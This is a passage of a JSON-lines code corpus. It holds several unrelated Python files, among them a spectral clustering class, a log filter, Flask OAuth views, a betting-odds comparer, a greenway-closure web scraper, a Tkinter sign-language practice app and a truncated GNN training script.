initialize distance matrix, dimension: NxN\n dist_matrix = np.zeros((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n dist_matrix[i][j] = dist_matrix[j][i] = distance(data[i], data[j])\n return dist_matrix\n\nclass SC(object):\n\n def __init__(self, n_clusters, knn_k):\n self.n_clusters = n_clusters\n self.knn_k = knn_k\n\n \"\"\" \n Get adjacent matrix\n input:\n data: raw data\n k: the number of cluster\n return:\n adjacent matrix\n \"\"\"\n def getW(self, data, k):\n n = len(data)\n dist_matrix = get_dist_matrix(data)\n\n W = np.zeros((n, n))\n for idx, dist in enumerate(dist_matrix):\n # sort each row and get index list\n # smaller distance means two points are closer\n idx_array = np.argsort(dist)\n # set the element in each row to 1\n # except for the diagonal elements\n W[idx][idx_array[1 : k + 1]] = 1\n W_T = np.transpose(W)\n return (W + W_T) / 2\n\n \"\"\"\n Get degree matrix\n input:\n W: adjacent matrix\n return:\n degree matrix\n \"\"\"\n def getD(self, W):\n D = np.diag(sum(W))\n return D\n\n \"\"\"\n Get unnormalized Laplace matrix\n input:\n W: adjacent matrix\n D: degree matrix\n return:\n Laplace matrix\n \"\"\"\n def getL(self, D,W):\n return D-W\n\n \"\"\"\n Get eigen matrix of Laplace matrix\n input:\n L: Laplace matrix\n k: the number of clusters\n return:\n eigen matrix\n \"\"\"\n def getEigen(self, L, cluster_num):\n eig_vec, eig_val, _ = np.linalg.svd(L)\n # get the first k smallest eigenvectors\n idx = np.argsort(eig_val)[0 : cluster_num]\n return eig_vec[:, idx]\n\n\n def fit(self, data):\n k = self.knn_k\n cluster_num = self.n_clusters\n data = np.array(data)\n W = self.getW(data, k)\n D = self.getD(W)\n L = self.getL(D, W)\n eig_vec = self.getEigen(L, cluster_num)\n self.eigvec = eig_vec\n\n\n def predict(self, data):\n clf = KMeans(n_clusters=self.n_clusters)\n s = clf.fit(self.eigvec) # clusters\n labels = s.labels_\n return labels\n\n\nif __name__ == '__main__':\n cluster_num = 3\n knn_k = 5\n data = np.array([[1, 2], [1.5, 1.8], [5, 8], [8, 8], [1, 0.6], [9, 11]])\n data = data[0:-1] # last column is the label\n spectral_clustering = SC(n_clusters= 3, knn_k = 5)\n spectral_clustering.fit(data)\n label = spectral_clustering.predict(data)\n\n","sub_path":"Lecture3/Point Cloud Homework III/Spectralclustering.py","file_name":"Spectralclustering.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"353285434","text":"import cvzone\nimport cv2\nimport numpy as np\n\nangle = 0\nfpsReader = cvzone.FPS()\n\n\ndef empty(a):\n pass\n\n\ncv2.namedWindow(\"Parameters\")\ncv2.resizeWindow(\"Parameters\", 640, 100)\ncv2.createTrackbar(\"Speed\", \"Parameters\", 1, 25, empty)\n\nwhile True:\n imgBack = np.ones((500, 800, 3), np.uint8) * 255\n imgG1 = cv2.imread(\"Resources/gear.png\", cv2.IMREAD_UNCHANGED)\n imgG2 = imgG1.copy()\n\n val = cv2.getTrackbarPos(\"Speed\", \"Parameters\")\n imgG1 = cvzone.rotateImage(imgG1, angle + 23)\n imgG2 = cvzone.rotateImage(imgG2, -angle)\n angle += val\n\n imgResult = cvzone.overlayPNG(imgBack, imgG1, [125, 100])\n imgResult = cvzone.overlayPNG(imgResult, imgG2, [400, 100])\n _, imgResult = fpsReader.update(imgResult)\n\n cv2.imshow(\"Image\", imgResult)\n cv2.waitKey(1)\n","sub_path":"GearRotation.py","file_name":"GearRotation.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"234393298","text":"def solution(cap, n, deliveries, pickups):\n answer = 0\n\n deli_cnt = 0\n pick_cnt = 0\n\n for i in range(n-1, -1, -1):\n deli_cnt += deliveries[i]\n pick_cnt += pickups[i]\n\n while deli_cnt > 0 or pick_cnt > 0:\n deli_cnt -= cap\n pick_cnt -= cap\n answer += (i+1) * 2\n\n return answer","sub_path":"Algorithm/programmers/택배 배달과 수거하기.py","file_name":"택배 배달과 수거하기.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"270181989","text":"import sys\nimport os\nimport copy\n\ntry:\n from config import Config\n from filter import Filter\nexcept ImportError:\n from unlog.config import Config\n from unlog.filter import Filter\n\n\nclass Unlog:\n \"\"\"Filter the output of a command or a log file according to patterns passed\n in the *args* argument or according to a config file.\n \"\"\"\n\n def __init__(self, args):\n \"\"\" **PARAMETERS**\n\n * *args* - an ArgumentParser object containing all the options. Look at\n :py:mod:`unlog.main` for the list of options.\n \"\"\"\n self._args = args\n self._check_args()\n if args.start_pattern:\n self._filter_from_args()\n else:\n self._filter_from_config()\n\n def _check_args(self):\n \"\"\"Verify that the arguments are coherent. Exit with error code 2 if\n incoherences are found.\n \"\"\"\n if not self._args.files and not self._args.start_pattern \\\n and not self._args.use_config_section:\n sys.stderr.write('You must give a file or a start pattern.\\n')\n sys.exit(2)\n if (self._args.start_group_pattern and not self._args.end_group_pattern)\\\n or (not self._args.start_group_pattern and self._args.end_group_pattern):\n sys.stderr.write('You must give both --start-group and --end-group.')\n sys.exit(2)\n\n def _filter_from_args(self):\n \"\"\"Filter the files or stdin according to the patterns given by the\n arguments provided on the command line.\n \"\"\"\n config = copy.copy(self._args.__dict__)\n # Must not be passed to filter (not useful)\n del config['files']\n # The following keys are only used when processing from a config file\n del config['config_file']\n del config['use_config_section']\n # The filter manipulates strings in the proper encoding. 
No need to pass it.\n del config['log_encoding']\n self._output_filter = Filter(**config)\n # If no files are provided, read from stdin\n if self._args.files:\n self._files = self._args.files\n self.process_files()\n else:\n self.process_stdin()\n\n def process_files(self):\n \"\"\"Loop on each file given on the command line and process them.\n \"\"\"\n for file in self._files:\n self.process_file(file, log_encoding=self._args.log_encoding)\n\n def process_file(self, file_name, log_encoding='utf-8'):\n \"\"\"Open file_name and process it with :py:meth:`unlog.filter.Filter.process_file`\n \"\"\"\n try:\n with open(file_name, 'r', encoding=log_encoding) as file:\n self._output_filter.process_file(file)\n except IOError as e:\n sys.stderr.write(str(e))\n sys.stderr.write(\"\\n\")\n\n def process_stdin(self):\n \"\"\"Process each line on the stdin with\n :py:meth:`unlog.filter.Filter.process_line`\n \"\"\"\n for line in iter(sys.stdin.readline, ''):\n self._output_filter.process_line(line)\n # We must print the stack when we reach the last line of stdin so that the\n # errors located at the end are displayed.\n self._output_filter.print_stack()\n self._output_filter.send_mail()\n\n def _filter_from_config(self):\n \"\"\"Filter the files according to the patterns defined in the\n configuration file.\n \"\"\"\n self._config = Config(self._args)\n if self._args.files:\n self.process_files_from_config()\n else:\n self._output_filter = self._config.get_filter()\n self.process_stdin()\n\n def process_files_from_config(self):\n \"\"\"Loop over each file given on the command line and process them\n according to the actions defined in the associated config file. The file\n is then passed to :py:meth:`process_file_filter_from_config`.\n \"\"\"\n for file_name in self._args.files:\n file_name = self._correct_path_input_file(file_name)\n self.process_file_filter_from_config(file_name)\n\n def _correct_path_input_file(self, file_name):\n \"\"\"Expand the ~ variable and transform a relative path into an absolute\n one.\n \"\"\"\n file_name = os.path.expanduser(file_name)\n file_name = os.path.abspath(file_name)\n return file_name\n\n def process_file_filter_from_config(self, file_name):\n \"\"\"Process the file_name with the filters defined in config with\n :py:meth:`process_file`.\n \"\"\"\n self._output_filter = self._config.get_filter(file_name)\n if self._output_filter:\n if 'encoding' in self._config:\n self.process_file(file_name, log_encoding=self._config['encoding'])\n else:\n self.process_file(file_name)\n","sub_path":"unlog/unlog.py","file_name":"unlog.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"614608908","text":"# -*- coding: utf-8 -*-\n\"\"\"\n flask-sentinel.views\n ~~~~~~~~~~~~~~~~~~~~\n\n :copyright: (c) 2015 by Nicola Iarocci.\n :license: BSD, see LICENSE for more details.\n\"\"\"\nimport os\nfrom flask import render_template, request, flash\n\nfrom .core import oauth\nfrom .data import Storage\nfrom .basicauth import requires_basicauth\nfrom .mail import send_email\n\n\n@oauth.token_handler\ndef access_token(*args, **kwargs):\n \"\"\" This endpoint is for exchanging/refreshing an access token.\n\n Returns a dictionary or None as the extra credentials for creating the\n token response.\n\n :param *args: Variable length argument list.\n :param **kwargs: Arbitrary keyword arguments.\n \"\"\"\n return None\n\n\n@requires_basicauth\ndef management():\n \"\"\" This endpoint is for viewing and adding users and clients. \"\"\"\n error = None\n if request.method == 'POST' and request.form['submit'] == 'Add User':\n email = request.form['email']\n result = Storage.save_user(request.form['username'],\n request.form['password'],\n email)\n if result['status'] == 'success':\n message = {\n 'auto_html': None,\n 'auto_text': None,\n 'from_email': os.getenv('FROM_EMAIL') or 'from@example.com',\n 'from_name': os.getenv('FROM_NAME') or 'Example Name',\n 'html': '<p>Example HTML content</p>',\n 'subject': 'Your Account is created!',\n 'tags': ['user-registration'],\n 'to': [{'email': email,\n 'type': 'to'}],\n 'track_clicks': True,\n 'track_opens': True}\n send_email(message)\n else:\n error = result['message']\n if request.method == 'POST' and request.form['submit'] == 'Add Client':\n Storage.generate_client()\n error = None\n return render_template('management.html', users=Storage.all_users(),\n clients=Storage.all_clients(), error=error)\n","sub_path":"flask_sentinel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"11689494","text":"import pandas as pd\nfrom itertools import zip_longest\nfrom supp_funcs import flatten, first_elem, first_elements, sure_bet\n\nclass Manipulator:\n def __init__(self, dfs, names_list):\n self.bets_names = names_list\n self.dfs_f = [tup[0] for tup in dfs]\n self.dfs_m = [tup[1] for tup in dfs]\n self.siblings = self.solitary_remove()\n self.unificated = self.unification()\n self.profitabilited = self.profitability()\n\n def solitary_remove(self):\n result = []\n for f_df, m_df, name in zip(self.dfs_f, self.dfs_m, self.bets_names):\n if f_df.empty or m_df.empty: continue\n result.append(((f_df, m_df), name))\n return result\n\n def unification(self):\n data_frames = self.siblings\n result = []\n for bets, name in data_frames: # loop over bet types\n fort = bets[0]\n mara = bets[1]\n\n f = fort.to_dict(orient='split')\n m = mara.to_dict(orient='split')\n\n f_index, f_columns, f_data = f['index'], f['columns'], f['data']\n m_index, m_columns, m_data = m['index'], m['columns'], m['data']\n\n longer_f_indexs_prices = sorted( ((idx.strip(), price) for idx, price in zip(f_index, f_data)), key=first_elem)\n longer_m_indexs_prices = sorted( filter(lambda x: not 'Brak opcji' in x[0],\n [(idx.strip(), price) for idx, price in zip(m_index, m_data)] ), key=first_elem )\n\n common = [row.strip() for row, _ in longer_f_indexs_prices if row.strip() in first_elements(longer_m_indexs_prices)]\n\n\n f_indexs_prices = dict( filter(lambda x: x[0] in common, longer_f_indexs_prices) )\n m_indexs_prices = dict( filter(lambda x: x[0] in common, longer_m_indexs_prices) )\n\n\n df_f =pd.DataFrame.from_dict(f_indexs_prices, orient='index', columns=f_columns)\n df_m =pd.DataFrame.from_dict(m_indexs_prices, orient='index', columns=m_columns)\n\n result.append(((df_f, df_m), name))\n\n return result\n\n def profitability(self):\n data_frames = self.unificated\n result = []\n sure_bet_names = ['GOLE',\n '1 DRUŻ. GOLE', '2 DRUŻ. GOLE', 'ŻÓŁTE KARTKI',\n '1.DRUŻ. ŻÓŁTE KARTKI', '2.DRUŻ. ŻÓŁTE KARTKI', '1.POŁ. ŻÓŁTE KARTKI',\n '1.DRUŻ 1.POŁ. ŻÓŁTE KARTKI', '2.DRUŻ 1.POŁ. ŻÓŁTE KARTKI', '2.POŁ. ŻÓŁTE KARTKI',\n '1.DRUŻ 2.POŁ. ŻÓŁTE KARTKI', '2.DRUŻ 2.POŁ. ŻÓŁTE KARTKI', 'ROŻNE',\n '1.DRUŻ. ROŻNE', '2.DRUŻ. ROŻNE', '1.POŁ. ROŻNE',\n '1.DRUŻ 1.POŁ. ROŻNE', '2.DRUŻ 1.POŁ. ROŻNE', '2.POŁ. ROŻNE',\n '1.DRUŻ 2.POŁ. ROŻNE', '2.DRUŻ 2.POŁ. ROŻNE']\n\n for bets, name in data_frames: # loop over bet types\n if name not in sure_bet_names:\n fort = bets[0]\n mara = bets[1]\n\n f = fort.to_dict(orient='split')\n m = mara.to_dict(orient='split')\n\n f_index, f_columns, f_data = f['index'], f['columns'], f['data']\n m_index, m_columns, m_data = m['index'], m['columns'], m['data']\n\n new_data_f, new_data_m = [], []\n for row_f, row_m in zip(f_data, m_data):\n new_row_f, new_row_m = [], []\n\n for cell_f, cell_m in zip_longest(row_f, row_m, fillvalue='Brak kursu'):\n\n if cell_f == 'Brak kursu':\n new_cell_f = cell_f\n new_cell_m = cell_m\n\n elif cell_m == 'Brak kursu':\n new_cell_f = cell_f\n new_cell_m = cell_m\n\n else:\n new_cell_f = str(cell_f)+'*({})'.format(round(float(cell_f) / float(cell_m), 3)) if float(cell_f) / float(cell_m) > 1 else str(cell_f)\n new_cell_m = str(cell_m)+'*({})'.format(round(float(cell_f) / float(cell_m), 3)) if float(cell_f) / float(cell_m) > 1 else str(cell_m)\n\n new_row_f.append(new_cell_f)\n new_row_m.append(new_cell_m)\n\n new_data_f.append(new_row_f)\n new_data_m.append(new_row_m)\n\n if len(f_columns) != len(m_columns):\n if len(f_columns) < len(m_columns):\n f_columns.append(m_columns[-1])\n else:\n m_columns.append(f_columns[-1])\n df_f =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(f_index, new_data_f)), orient='index', columns=f_columns)\n df_m =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(m_index, new_data_m)), orient='index', columns=m_columns)\n\n result.append(((df_f, df_m), name))\n\n else:\n fort = bets[0]\n mara = bets[1]\n\n f = fort.to_dict(orient='split')\n m = mara.to_dict(orient='split')\n\n f_index, f_columns, f_data = f['index'], f['columns'], f['data']\n m_index, m_columns, m_data = m['index'], m['columns'], m['data']\n\n new_data_f, new_data_m = [], []\n for row_f, row_m in zip(f_data, m_data):\n left_cell_f, right_cell_f = row_f\n left_cell_m, right_cell_m = row_m\n\n new_row_f, new_row_m = [], []\n\n if left_cell_f == 'Brak kursu' or right_cell_f == 'Brak kursu' or left_cell_m == 'Brak kursu' or right_cell_m == 'Brak kursu':\n new_left_cell_f = left_cell_f\n new_right_cell_f = right_cell_f\n new_left_cell_m = left_cell_m\n new_right_cell_m = right_cell_m\n\n else:\n new_left_cell_f = str(left_cell_f)+'**({})'.format(round(sure_bet(left_cell_f, right_cell_m), 3)) if float(left_cell_f) / float(left_cell_m) > 1 and sure_bet(left_cell_f, right_cell_m) > 0 else str(left_cell_f)\n new_right_cell_f = str(right_cell_f)+'**({})'.format(round(sure_bet(right_cell_f, left_cell_m), 3)) if float(right_cell_f) / float(right_cell_m) > 1 and sure_bet(right_cell_f, left_cell_m) > 0 else str(right_cell_f)\n new_left_cell_m = left_cell_m\n new_right_cell_m = right_cell_m\n\n new_row_f.append([new_left_cell_f, new_right_cell_f])\n new_row_m.append([new_left_cell_m, new_right_cell_m])\n\n new_data_f.append(new_row_f)\n new_data_m.append(new_row_m)\n\n if len(f_columns) != len(m_columns):\n if len(f_columns) < len(m_columns):\n f_columns.append(m_columns[-1])\n else:\n m_columns.append(f_columns[-1])\n\n\n df_f =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(f_index, flatten(new_data_f))), orient='index', columns=f_columns)\n df_m =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(m_index, flatten(new_data_m))), orient='index', columns=m_columns)\n\n result.append(((df_f, df_m), name))\n return result 
\n","sub_path":"preparer.py","file_name":"preparer.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207432568","text":"from kivy.lang import Builder\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.garden.graph import MeshLinePlot\nfrom kivy.clock import Clock\nfrom threading import Thread\nfrom math import sin\nfrom random import randint\nfrom collections import deque\nfrom time import sleep\n\n\ndef get_microphone_level():\n\tglobal levels\n\tglobal dq\n\tdq = deque()\n\twhile True:\n\t\tif len(dq) >= 100:\n\t\t\tdq.popleft()\n\t\tdq.append(randint(0,9))\n\t\tlevels = list(dq)\n\t\tsleep(0.01)\n\n\nclass Logic(BoxLayout):\n def __init__(self,):\n super(Logic, self).__init__()\n self.plot = MeshLinePlot(color=[1, 0, 0, 1])\n\n def start(self):\n self.ids.graph.add_plot(self.plot)\n Clock.schedule_interval(self.get_value, 0.01)\n\n def stop(self):\n Clock.unschedule(self.get_value)\n\n def get_value(self, dt):\n self.plot.points = [(i, j) for i, j in enumerate(levels)] \n\n\nclass RealTimeMicrophone(App):\n def build(self):\n return Builder.load_file(\"look.kv\")\n\nif __name__ == \"__main__\":\n levels = [] # store levels of microphone\n dq = [] # store levels of microphone\n get_level_thread = Thread(target = get_microphone_level)\n get_level_thread.daemon = True\n get_level_thread.start()\n RealTimeMicrophone().run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308653828","text":"# IMPORTS\nimport os\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport sqlite3\nfrom sqlite3 import Error\n\n# GLOBAL VARIABLES\n## Site URL\nurl = \"https://www.raleighnc.gov/parks/content/PRecDesignDevelop/Articles/GreenwayRepairs.html\"\n\n## Database\ncwd = os.getcwd()\ndb = \"{}/gw_closures.db\".format(cwd)\n\n## Get time of run\nrun_time = datetime.now()\nrun_id = int(run_time.strftime(\"%Y%m%d%H%M%S\"))\n\n# HELPER FUNCTIONS\n\n## Get the HTML for the Greenway closure page\ndef retrieve_gw_closure_html(url):\n r = requests.get(url)\n return BeautifulSoup(r.text, features='html5lib')\n\n## Create connection to database\ndef create_connection(db_file):\n try:\n connection = sqlite3.connect(db_file)\n return connection\n except Error as e:\n print(e)\n\n return None\n\n## Create new row in database table\ndef create_row(connection, sql, project):\n cursor = connection.cursor()\n cursor.execute(sql, project)\n\n# MAIN FUNCTION BODY\ndef main():\n # Retrieve the full site\n print(\"Retrieving HTML from the greenway closures page...\")\n try:\n full_site = retrieve_gw_closure_html(url)\n except Exception as e:\n print(e)\n finally:\n print(\"Success!\")\n\n # Gather all the divs with section class\n closures = full_site.find_all(\"div\", {\"class\": \"section\"})\n\n # Create a connection to the database\n connection = create_connection(db)\n\n # Add rows to closure table\n print(\"Adding rows to table \\'closure\\'\")\n for closure in closures:\n website_id = closure.find_all('h3')[0].get('id')\n name = closure.find_all(\"h3\")[0].text.replace(\"\\n\", \"\")\n description = closure.select(\".collapse\")[0].text.replace(\"\\n\", \"\")\n\n with connection:\n try:\n closure_sql = ''' INSERT INTO closure(run_id,website_id,name,description)\n VALUES(?,?,?,?) 
'''\n closure_project = (run_id, website_id, name, description)\n create_row(connection, closure_sql, closure_project)\n except Exception as e:\n print(e)\n print(\"Success!\")\n\n print(\"Adding rows to table \\'closure_links\\'\")\n # Add rows to links table\n for closure in closures:\n closure_info_list = []\n\n website_id = closure.find_all('h3')[0].get('id')\n name = closure.find_all(\"h3\")[0].text.replace(\"\\n\", \"\")\n description = closure.select(\".collapse\")[0].text.replace(\"\\n\", \"\")\n closure_links = closure.find_all(\"a\")\n for link in closure_links:\n href = link.get(\"href\")\n if href[0:4] != \"http\":\n if href[0] == \"/\":\n href = href[1:]\n closure_link = \"https://www.raleighnc.gov/{}\".format(href)\n else:\n closure_link = href\n\n with connection:\n try:\n closure_links_sql = ''' INSERT INTO closure_links(run_id,website_id,url)\n VALUES(?,?,?) '''\n closure_links_project = (run_id, website_id, closure_link)\n create_row(connection, closure_links_sql, closure_links_project)\n except Error as e:\n print(e)\n print(\"Success!\")\n\n print(\"Adding rows to table \\'closure_update\\'\")\n # Add row for run info\n ## Parse updated date header\n updated_date = full_site.find_all(\"div\", {\"class\": \"updatedDate\"})[0].text\n replacements = ((\"Last updated \", \"\"), (\".\", \"\"), (\",\", \"\"), (\"- \", \"\"))\n updated_date_clean = updated_date\n\n for r in replacements:\n updated_date_clean = updated_date_clean.replace(*r)\n updated_date_list = updated_date_clean.split()\n updated_date_datetime = datetime.strptime(updated_date_clean, \"%b %d %Y %I:%M %p\")\n updated_date_timestamp = updated_date_datetime.timestamp()\n\n ## Add row\n with connection:\n try:\n closure_update_sql = ''' INSERT INTO closure_update(run_id,updated)\n VALUES(?,?) 
'''\n closure_update_project = (run_id,int(updated_date_timestamp))\n create_row(connection, closure_update_sql, closure_update_project)\n except Error as e:\n print(e)\n print(\"Success!\")\n\n# MAIN FUNCTION CALL\nif __name__ == '__main__':\n main()\n","sub_path":"gw_closure_scraper.py","file_name":"gw_closure_scraper.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468111170","text":"import tkinter as tk\nfrom tkinter import font as tkfont\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom PIL import Image, ImageTk\nimport os\n\nclass PracticeApp(tk.Tk):\n\n\tdef __init__(self, *args, **kwargs):\n\t\ttk.Tk.__init__(self, *args, **kwargs)\n\n\t\tself.title_font = tkfont.Font(family='Helvetica', size=16)\n\t\tself.h1_font = tkfont.Font(family='Helvetica', size=16)\n\t\tself.body_font = tkfont.Font(family='Helvetica', size=12)\n\t\tself.geometry(\"1024x576\") #You want the size of the app to be 500x500\n\t\tself.resizable(0, 0) #Don't allow resizing in the x or y \n\t\t# the container is where we'll stack a bunch of frames\n\t\t# on top of each other, then the one we want visible\n\t\t# will be raised above the others\n\t\tself.wm_title(\"Fingerspelling - Practice Module\")\n\t\tcontainer = tk.Frame(self)\n\t\tcontainer.pack(side=\"top\", fill=\"both\", expand=True)\n\t\tcontainer.grid_rowconfigure(0, weight=1)\n\t\tcontainer.grid_columnconfigure(0, weight=1)\n\n\t\tself.frames = {}\n\t\tfor F in (StartPage, PageOne):\n\t\t\tpage_name = F.__name__\n\t\t\tframe = F(parent=container, controller=self)\n\t\t\tself.frames[page_name] = frame\n\n\t\t\t# put all of the pages in the same location;\n\t\t\t# the one on the top of the stacking order\n\t\t\t# will be the one that is visible.\n\t\t\tframe.grid(row=0, column=0, sticky=\"nsew\")\n\n\t\tself.show_frame(\"StartPage\")\n\n\tdef show_frame(self, page_name):\n\t\t'''Show a frame for the given page name'''\n\t\tframe = self.frames[page_name]\n\t\tframe.tkraise()\n\n\nclass StartPage(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\t\tself.controller = controller\n\t\t# create the canvas, size in pixels\n\t\t# background_image=tk.PhotoImage(\"web_parallax.jpg\")\n\t\t# background_label = tk.Label(self, image=background_image)\n\t\t# background_label.place(x=0, y=0, relwidth=1, relheight=1)\n\t\tload = Image.open(\"web_parallax.jpg\")\n\t\trender = ImageTk.PhotoImage(load)\n\n\t\t# labels can be text or images\n\t\timg = Label(self, image=render)\n\t\timg.image = render\n\t\timg.place(x=0, y=0)\n\t\ttitle_label = tk.Label(self, text=\"Fingerspelling - Indian Sign Language Training Tool\", font=controller.title_font)\n\t\ttitle_label.place(relx=.53, rely=.30, anchor=\"c\")\n\n\t\thead_label = tk.Label(self, text=\"Practice Indian Sign Language Gestures\", font=controller.h1_font)\n\t\thead_label.place(relx=.53, rely=.35, anchor=\"c\")\n\t\t\n\t\tinst_label = tk.Label(self, text=\"Start practicing your gestures today! 
\\nEnsure your primary webcam is working and room is well illuminated\", font=controller.body_font)\n\t\tinst_label.place(relx=.53, rely=.65, anchor=\"c\")\n\t\tbutton1 = tk.Button(self, text=\"►\", bg=\"#1eeeee\", fg=\"black\",command=lambda: controller.show_frame(\"PageOne\"), font=controller.h1_font)\n\t\t# button2 = tk.Button(self, text=\"Go to Page Two\",command=lambda: controller.show_frame(\"PageTwo\"))\n\t\tbutton1.place(relx=.9, rely=.8, anchor=\"c\")\n\t\t# button2.pack(side=\"top\", fill=\"x\", pady=10)\n\n\nclass PageOne(tk.Frame):\n\talphabets=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\t\tself.controller = controller\n\t\t# create the canvas, size in pixels\n\t\tload = Image.open(\"web_parallax.jpg\")\n\t\trender = ImageTk.PhotoImage(load)\n\t\t# labels can be text or images\n\t\timg = Label(self, image=render)\n\t\timg.image = render\n\t\timg.place(x=0, y=0)\n\n\t\ttitle_label = tk.Label(self, text=\"Fingerspelling - Indian Sign Language Training Tool\", font=controller.title_font)\n\t\ttitle_label.place(relx=.53, rely=.30, anchor=\"c\")\n\n\t\tlabel = tk.Label(self, text=\"Click on the alphabet you want to practice \\nA new window will open where you will see the camera feed \\nPerform Gestures in front of the camera \\nSystem will show a rectangle in front of your hands when gesture is detected \\n Ensure Proper lighting condition\", font=controller.body_font)\n\t\tlabel.place(relx=.53, rely=.65, anchor=\"c\")\n\n\t\tback_button = tk.Button(self, text=\"Back\", bg=\"#1eeeee\", fg=\"black\",command=lambda: controller.show_frame(\"StartPage\"), font=controller.h1_font)\n\t\tback_button.place(relx=.1, rely=.95, anchor=\"c\")\n\n\t\tfor i in self.alphabets:\t\t\n\t\t\ta_button = tk.Button(self, text=chr(i+64), bg=\"#1eeeee\", font=controller.h1_font, fg=\"black\",command=lambda i=i: os.system(str(chr(i+64))+\".py\"), width=2)\n\t\t\tif i==1:\n\t\t\t\ta_button.grid(row=0,column=i, padx=(17,2.3),pady=450)\n\t\t\telse:\n\t\t\t\ta_button.grid(row=0,column=i, padx=2.3,pady=450)\n\n\nif __name__ == \"__main__\":\n\tapp = PracticeApp()\n\tapp.mainloop()","sub_path":"Practice module/Practice.py","file_name":"Practice.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482574589","text":"from sklearn.metrics import roc_curve, roc_auc_score,accuracy_score,precision_score,recall_score,f1_score\nfrom tensorboardX import SummaryWriter\nimport os\nfrom args import *\nfrom model import *\nfrom utils import *\nfrom dataset import *\nimport time\nimport numpy as np\nimport torch\nif not os.path.isdir('results'):\n os.mkdir('results')\n# args\nargs = make_args()\nprint(args)\nnp.random.seed(123)\nnp.random.seed()\nwriter_train = SummaryWriter(comment=args.task+'_'+args.model+'_'+args.comment+'_train')\nwriter_val = SummaryWriter(comment=args.task+'_'+args.model+'_'+args.comment+'_val')\nwriter_test = SummaryWriter(comment=args.task+'_'+args.model+'_'+args.comment+'_test')\n\nprint(args.gpu)\n# set up gpu\nif args.gpu:\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ['CUDA_VISIBLE_DEVICES'] = str(args.cuda)\n print('Using GPU {}'.format(os.environ['CUDA_VISIBLE_DEVICES']))\nelse:\n print('Using CPU')\ndevice = torch.device('cuda:'+str(args.cuda) if args.gpu else 'cpu')\n\n\nfor task in ['link', 'link_pair']:\n args.task = task\n if args.dataset=='All':\n if task == 'link':\n 
datasets_name = ['grid','communities','ppi']\n else:\n datasets_name = ['communities', 'email', 'protein']\n else:\n datasets_name = [args.dataset]\n for dataset_name in datasets_name:\n # if dataset_name in ['communities','grid']:\n # args.cache = False\n # else:\n # args.epoch_num = 401\n # args.cache = True\n results_auc,results_acc,results_prec,results_rec,results_f1 = [],[],[],[],[]\n for repeat in range(args.repeat_num):\n result_val = []\n result_auc,result_acc,result_prec,result_rec,result_f1 = [],[],[],[],[]\n time1 = time.time()\n data_list = get_tg_dataset(args, dataset_name, use_cache=args.cache, remove_feature=args.rm_feature)\n time2 = time.time()\n print(dataset_name, 'load time', time2-time1)\n\n num_features = data_list[0].x.shape[1]\n num_node_classes = None\n num_graph_classes = None\n if 'y' in data_list[0].__dict__ and data_list[0].y is not None:\n num_node_classes = max([data.y.max().item() for data in data_list])+1\n if 'y_graph' in data_list[0].__dict__ and data_list[0].y_graph is not None:\n num_graph_classes = max([data.y_graph.numpy()[0] for data in data_list])+1\n print('Dataset', dataset_name, 'Graph', len(data_list), 'Feature', num_features, 'Node Class', num_node_classes, 'Graph Class', num_graph_classes)\n nodes = [data.num_nodes for data in data_list]\n edges = [data.num_edges for data in data_list]\n print('Node: max{}, min{}, mean{}'.format(max(nodes), min(nodes), sum(nodes)/len(nodes)))\n print('Edge: max{}, min{}, mean{}'.format(max(edges), min(edges), sum(edges)/len(edges)))\n\n args.batch_size = min(args.batch_size, len(data_list))\n print('Anchor num {}, Batch size {}'.format(args.anchor_num, args.batch_size))\n\n # data\n for i,data in enumerate(data_list):\n preselect_anchor(data, layer_num=args.layer_num, anchor_num=args.anchor_num, device='cpu')\n data = data.to(device)\n data_list[i] = data\n\n # model\n input_dim = num_features\n output_dim = args.output_dim\n model = locals()[args.model](input_dim=input_dim, feature_dim=args.feature_dim,\n hidden_dim=args.hidden_dim, output_dim=output_dim,\n feature_pre=args.feature_pre, layer_num=args.layer_num, dropout=args.dropout,agg=args.agg).to(device)\n # loss\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=5e-4)\n if 'link' in args.task:\n loss_func = nn.BCEWithLogitsLoss()\n out_act = nn.Sigmoid()\n\n\n for epoch in range(args.epoch_num):\n if epoch==200:\n for param_group in optimizer.param_groups:\n param_group['lr'] /= 10\n model.train()\n optimizer.zero_grad()\n shuffle(data_list)\n effective_len = len(data_list)//args.batch_size*len(data_list)\n\n for id, data in 